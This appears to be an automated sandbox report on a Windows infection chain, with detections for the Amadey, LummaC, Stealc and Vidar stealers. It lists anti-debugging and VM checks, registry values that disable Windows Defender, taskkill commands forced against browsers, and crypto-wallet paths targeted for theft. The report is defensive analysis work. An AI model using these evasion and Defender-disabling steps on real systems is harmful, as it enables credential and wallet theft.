Source: EBAEBFIIEC.exe, 00000009.00000003.2225256889.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}!
Source: 0882197cda.exe, 00000010.00000002.2678008367.00000000018A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWxg
Source: 0882197cda.exe, 00000010.00000002.2678008367.000000000185E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2215093487.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215093487.0000000001A47000.00000004.00000020.00020000.00000000.sdmp, 5a20612cd1.exe, 0000000F.00000002.2574983040.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, 0882197cda.exe, 00000010.00000002.2678008367.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2885586316.000002949DCEC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2885586316.000002949DCA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001F.00000002.2891102981.00000294A7DBF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: file.exe, 00000000.00000002.2214382919.0000000001239000.00000040.00000001.01000000.00000003.sdmp, EBAEBFIIEC.exe, 00000009.00000002.2254331253.0000000000764000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2293486604.0000000001174000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000002.2293226797.0000000001174000.00000040.00000001.01000000.0000000D.sdmp, 5a20612cd1.exe, 0000000F.00000002.2574231478.00000000007E6000.00000040.00000001.01000000.0000000F.sdmp, 0882197cda.exe, 00000010.00000002.2676985278.0000000001299000.00000040.00000001.01000000.00000010.sdmp, 5a20612cd1.exe, 00000011.00000002.3290918350.00000000007E6000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: EBAEBFIIEC.exe, 00000009.00000003.2236068829.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\7
Source: 5a20612cd1.exe, 0000000F.00000002.2574983040.000000000106E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: firefox.exe, 0000001F.00000002.2885586316.000002949DCEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe File opened: SIWVID
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_04DD0380 rdtsc 9_2_04DD0380
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C5B5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5BC410
Contains functionality to read the PEB
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005A652B mov eax, dword ptr fs:[00000030h] 9_2_005A652B
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Code function: 9_2_005AA302 mov eax, dword ptr fs:[00000030h] 9_2_005AA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FBA302 mov eax, dword ptr fs:[00000030h] 10_2_00FBA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00FB652B mov eax, dword ptr fs:[00000030h] 10_2_00FB652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FBA302 mov eax, dword ptr fs:[00000030h] 11_2_00FBA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00FB652B mov eax, dword ptr fs:[00000030h] 11_2_00FB652B
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C58B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C58B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0882197cda.exe PID: 2324, type: MEMORYSTR
Excessive usage of taskkill to terminate processes
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBAEBFIIEC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\EBAEBFIIEC.exe "C:\Users\user\Documents\EBAEBFIIEC.exe" Jump to behavior
Source: C:\Users\user\Documents\EBAEBFIIEC.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe "C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe "C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe "C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe "C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe "C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Process created: unknown unknown
Uses taskkill to terminate processes
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 6693ff7180.exe, 00000012.00000002.2802281447.00000000010A2000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 5a20612cd1.exe, 0000000F.00000002.2574231478.00000000007E6000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: file.exe, file.exe, 00000000.00000002.2214382919.0000000001239000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #q`Program Manager
Source: skotes.exe, skotes.exe, 0000000B.00000002.2293589397.00000000011B4000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: eProgram Manager
Source: firefox.exe, 0000001F.00000002.2877647317.000000C4687FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?ProgmanListenerWi
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B341 cpuid 0_2_6C58B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013507001\6693ff7180.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013504001\3e3be1ecc4.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013506001\0882197cda.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5535A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5535A0
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1013508001\9c573f8941.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013505001\5a20612cd1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 11.2.skotes.exe.f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.EBAEBFIIEC.exe.570000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.skotes.exe.f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.2253656280.0000000000571000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2292827428.0000000000F81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2293075274.0000000000F81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 6693ff7180.exe PID: 1364, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 5a20612cd1.exe PID: 5868, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2215093487.00000000019CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2870102600.0000000001C7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1715851813.0000000005810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.2776871674.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2678008367.000000000185E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2627978298.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2676726532.0000000000EC1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2864346736.0000000000EC1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2213992001.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0882197cda.exe PID: 2324, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 00000000.00000002.2215093487.00000000019CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Electrum
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000000.00000002.2213992001.0000000000EE4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: window-state.json
